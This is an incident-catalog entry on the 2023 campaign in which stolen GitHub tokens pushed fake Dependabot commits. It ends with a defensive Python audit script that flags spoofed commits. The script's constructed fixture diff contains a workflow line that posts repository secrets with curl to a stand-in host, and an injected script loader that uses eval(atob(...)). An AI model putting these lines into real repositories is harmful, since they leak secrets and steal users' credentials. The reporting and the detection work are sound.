Campaign Open Source 2023-07-08 · 3 days · Credential Theft, Data Exfiltration, Source Code Modification

Fake Dependabot commits poisoned GitHub repositories

In July 2023, attackers used stolen GitHub personal access tokens to push malicious commits into hundreds of public and private repositories while making the commits appear to come from Dependabot.

Story

This campaign sits right on the catalog boundary. The attacker did not compromise GitHub's Dependabot service, and a fake Dependabot identity by itself would not be enough for this dataset. What makes the incident qualify is the part Checkmarx confirmed with victims: stolen GitHub personal access tokens were used to push malicious code into real repositories. Those repositories were the authoritative source locations for their projects, even if the public victim list does not yet include a widely known open-source project.

The social engineering was aimed at reviewers, not at the login step. Between July 8 and July 11, 2023, malicious commits landed in hundreds of GitHub repositories. The commits used a fabricated author presentation to look like dependabot[bot] and carried a bland commit message, often just "fix". To a maintainer scanning history quickly, that looked close enough to routine automated dependency maintenance to be ignored.

The payload had two parts. First, the attacker added a GitHub Actions workflow named hook.yml that ran on every push and sent repository secrets and variables to send.wagateway.pro/webhook. Second, in repositories with JavaScript, the attacker appended an obfuscated browser-side loader to existing .js files. That loader pulled send.wagateway.pro/client.js?cache=ignore and initialized form interception logic intended to steal credentials entered into web forms.

Checkmarx said most of the visible victims were Indonesian user accounts and that private GitHub organization repositories were affected when the stolen tokens had that reach. The company did not publish the full victim list, so this entry keeps the public examples as evidence rather than treating them as the whole blast radius. The two clearest examples are juniorriau/kejaribiak, where the JavaScript password-stealer append is visible, and Highpolar-Softwares/I-help-privacy-policy, where the hook.yml secret-exfiltration workflow is visible.

The likely upstream credential-theft mechanism remains unconfirmed. Checkmarx suspected the tokens may have been stolen from developer machines by malicious packages or similar local infostealer activity. The important supply-chain lesson is narrower and more durable: a PAT with repository write access can bypass 2FA at the point of use, and once it is stolen, an attacker can alter source in a way that looks like normal automated maintenance unless reviewers inspect the actual diff.
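One way to turn the two lessons above (a spoofed dependabot[bot] author presentation, and a pushed workflow or script that ships secrets or loads code from an outside host) into a repository audit. This is an added example, not code from the catalog record or from Checkmarx; it assumes Dependabot's canonical noreply author address and that GitHub signs Dependabot's commits, and every host name, commit hash and diff in it is constructed for the example.

```python
"""Audit git history for spoofed dependabot[bot] commits and for added workflow
or JavaScript text that references repository secrets or loads code from an
unexpected host. Added example; all fixture data below is constructed."""
import re
from dataclasses import dataclass

# Assumption: Dependabot's canonical author identity. GitHub signs Dependabot's
# commits, so `git log --format=%G?` shows 'G' once GitHub's web-flow signing
# key is in the local keyring (without that key the status is 'E', not 'G').
DEPENDABOT_NAME = "dependabot[bot]"
DEPENDABOT_EMAIL = "49699333+dependabot[bot]@users.noreply.github.com"
LOG_FORMAT = "%H%x1f%an%x1f%ae%x1f%G?%x1f%s"   # fields split on 0x1f

# Hosts this project's workflows and scripts are expected to contact.
ALLOWED_HOSTS = {"github.com", "api.github.com", "registry.npmjs.org"}

SECRETS_REF = re.compile(r"\$\{\{[^}]*\b(secrets|vars)\b[^}]*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
OBFUSCATION = re.compile(r"\b(eval|Function|unescape|atob)\s*\(|fromCharCode")


@dataclass
class Commit:
    sha: str
    author_name: str
    author_email: str
    sig_status: str   # value of %G?
    subject: str
    added: dict       # new path -> text of the lines this commit added


def parse_log_line(line: str) -> tuple:
    """Split one line produced by `git log --format=LOG_FORMAT`."""
    return tuple(line.rstrip("\n").split("\x1f", 4))


def added_by_file(patch: str) -> dict:
    """Collect the '+' lines of a unified diff, keyed by the new ('b/') path."""
    added, path = {}, None
    for line in patch.splitlines():
        if line.startswith("+++ "):
            name = line[4:].strip()
            path = name[2:] if name.startswith("b/") else name
            added[path] = ""
        elif path and line.startswith("+") and not line.startswith("+++"):
            added[path] += line[1:] + "\n"
    return added


def external_hosts(text: str) -> set:
    return {h.lower() for h in URL_HOST.findall(text)} - ALLOWED_HOSTS


def audit_commit(c: Commit) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings, tag = [], c.sha[:7]
    if c.author_name == DEPENDABOT_NAME:
        if c.author_email != DEPENDABOT_EMAIL:
            findings.append(f"{tag}: dependabot[bot] name with foreign email {c.author_email}")
        if c.sig_status != "G":
            findings.append(f"{tag}: dependabot[bot] commit lacks a good GitHub signature (%G?={c.sig_status})")
    for path, text in c.added.items():
        hosts = sorted(external_hosts(text))
        if path.startswith(".github/workflows/") and hosts and SECRETS_REF.search(text):
            findings.append(f"{tag}: workflow {path} reads secrets/vars and contacts {hosts}")
        if path.endswith(".js") and hosts and OBFUSCATION.search(text):
            findings.append(f"{tag}: {path} appends obfuscated code that loads from {hosts}")
    return findings


# Constructed fixtures: a genuine-looking dependency bump and a spoofed commit.
GENUINE = Commit(
    "1111111aaaa", DEPENDABOT_NAME, DEPENDABOT_EMAIL, "G",
    "Bump lodash from 4.17.20 to 4.17.21",
    {"package.json": '    "lodash": "4.17.21",\n'},
)

SPOOFED_PATCH = """\
diff --git a/.github/workflows/hook.yml b/.github/workflows/hook.yml
--- /dev/null
+++ b/.github/workflows/hook.yml
@@ -0,0 +1,6 @@
+on: push
+jobs:
+  hook:
+    runs-on: ubuntu-latest
+    steps:
+      - run: curl -d '${{ toJSON(secrets) }}' https://collector.example.invalid/webhook
diff --git a/static/app.js b/static/app.js
--- a/static/app.js
+++ b/static/app.js
@@ -40,1 +40,2 @@
 init();
+var s=document.createElement("script");s.src="https://collector.example.invalid/client.js";eval(atob("dmFyIHg9MTs="));
"""

SPOOFED = Commit(*parse_log_line(
    "2222222bbbb\x1fdependabot[bot]\x1fattacker@example.invalid\x1fN\x1ffix"),
    added=added_by_file(SPOOFED_PATCH))

if __name__ == "__main__":
    for commit in (GENUINE, SPOOFED):
        for finding in audit_commit(commit) or [f"{commit.sha[:7]}: clean"]:
            print(finding)
```

In a real repository the inputs come from `git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s'` for the header fields and `git show --format= <sha>` for the patch fed to `added_by_file`. The signature check is the strongest of the three: a PAT-pushed commit can copy Dependabot's name and message, but it does not carry GitHub's signature. The workflow and script heuristics only catch the shapes seen in this campaign (a secrets context next to an unlisted host, and an appended obfuscated loader), so treat their output as a triage list that still needs the diff read by a person.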

Campaign Context

Cause
Unknown

Notes

  • Checkmarx reported hundreds of affected repositories, including private organization repositories, but did not publish the full victim list.
  • This record does not claim GitHub Dependabot was compromised. The attacker spoofed the commit presentation while using stolen repository credentials.
  • No high-signal, widely known open-source project impact has been confirmed from the public sources reviewed so far.
  • The public example repositories are included as evidence of the technique and payload, not as a complete affected-project list.

External References

Source record: oss/campaigns/fake-dependabot-github-2023/meta.yaml